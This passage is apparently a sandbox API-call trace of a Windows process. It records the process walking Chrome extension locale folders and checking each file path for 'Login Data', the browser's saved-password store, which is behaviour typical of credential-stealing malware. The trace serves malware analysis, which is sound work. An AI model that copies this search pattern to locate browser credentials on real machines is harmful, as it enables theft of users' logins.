dwReserved1=0x690065, cFileName="no", cAlternateFileName="")) returned 1 [0161.749] lstrcmpiW (lpString1="no", lpString2=".") returned 1 [0161.749] lstrcmpiW (lpString1="no", lpString2="..") returned 1 [0161.749] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.749] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.749] lstrlenW (lpString="\\") returned 1 [0161.749] GetProcessHeap () returned 0x8e0000 [0161.749] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.749] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.749] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.749] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.749] lstrlenW (lpString="no") returned 2 [0161.749] GetProcessHeap () returned 0x8e0000 [0161.749] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.749] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.749] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no" [0161.749] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.749] GetProcessHeap () returned 0x8e0000 [0161.749] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.750] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no") returned 137 [0161.750] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no") returned 137 [0161.750] lstrlenW (lpString="\\*.*") returned 4 [0161.750] GetProcessHeap () returned 0x8e0000 [0161.750] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.750] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no" [0161.750] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*.*" [0161.750] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865f7db0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8661df10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8661df10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.750] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.750] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865f7db0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8661df10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8661df10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.750] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.750] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.750] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8661df10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8661cf70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfe051a00, ftLastWriteTime.dwHighDateTime=0x1d03f5d, nFileSizeHigh=0x0, nFileSizeLow=0xc3, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.750] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no") returned 137 [0161.750] lstrlenW (lpString="\\") returned 1 [0161.750] GetProcessHeap () returned 0x8e0000 [0161.750] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.750] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no" [0161.750] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\" [0161.750] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\") returned 138 [0161.750] lstrlenW (lpString="messages.json") returned 13 [0161.750] GetProcessHeap () returned 0x8e0000 [0161.750] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.750] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\" [0161.750] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" [0161.750] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.750] GetProcessHeap () returned 0x8e0000 [0161.751] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.751] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json", lpSrch="Login Data") returned 0x0 [0161.751] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.751] GetProcessHeap () returned 0x8e0000 [0161.751] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.751] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8661df10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8661cf70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfe051a00, ftLastWriteTime.dwHighDateTime=0x1d03f5d, nFileSizeHigh=0x0, nFileSizeLow=0xc3, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.751] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.751] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.751] GetProcessHeap () returned 0x8e0000 [0161.751] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.751] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.751] GetProcessHeap () returned 0x8e0000 [0161.751] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.751] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8661df10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8661df10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8661df10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="pl", cAlternateFileName="")) returned 1 [0161.751] lstrcmpiW (lpString1="pl", lpString2=".") returned 1 [0161.751] lstrcmpiW (lpString1="pl", lpString2="..") returned 1 [0161.751] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.751] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.751] lstrlenW (lpString="\\") returned 1 [0161.751] GetProcessHeap () returned 0x8e0000 [0161.751] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.751] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.751] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.751] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.751] lstrlenW (lpString="pl") returned 2 [0161.751] GetProcessHeap () returned 0x8e0000 [0161.751] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.751] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.751] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl" [0161.751] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.751] GetProcessHeap () returned 0x8e0000 [0161.751] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.752] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl") returned 137 [0161.752] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl") returned 137 [0161.752] lstrlenW (lpString="\\*.*") returned 4 [0161.752] GetProcessHeap () returned 0x8e0000 [0161.752] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.752] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl" [0161.752] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*.*" [0161.752] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8661df10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8661df10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8661df10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.753] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.753] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8661df10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8661df10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8661df10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.753] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.753] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.753] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8661df10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8661cf70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.753] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl") returned 137 [0161.753] lstrlenW (lpString="\\") returned 1 [0161.753] GetProcessHeap () returned 0x8e0000 [0161.753] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.753] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl" [0161.753] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\" [0161.753] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\") returned 138 [0161.753] lstrlenW (lpString="messages.json") returned 13 [0161.753] GetProcessHeap () returned 0x8e0000 [0161.753] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.753] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\" [0161.753] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" [0161.753] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.753] GetProcessHeap () returned 0x8e0000 [0161.753] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.753] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.753] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.753] GetProcessHeap () returned 0x8e0000 [0161.753] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.753] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8661df10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8661cf70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, 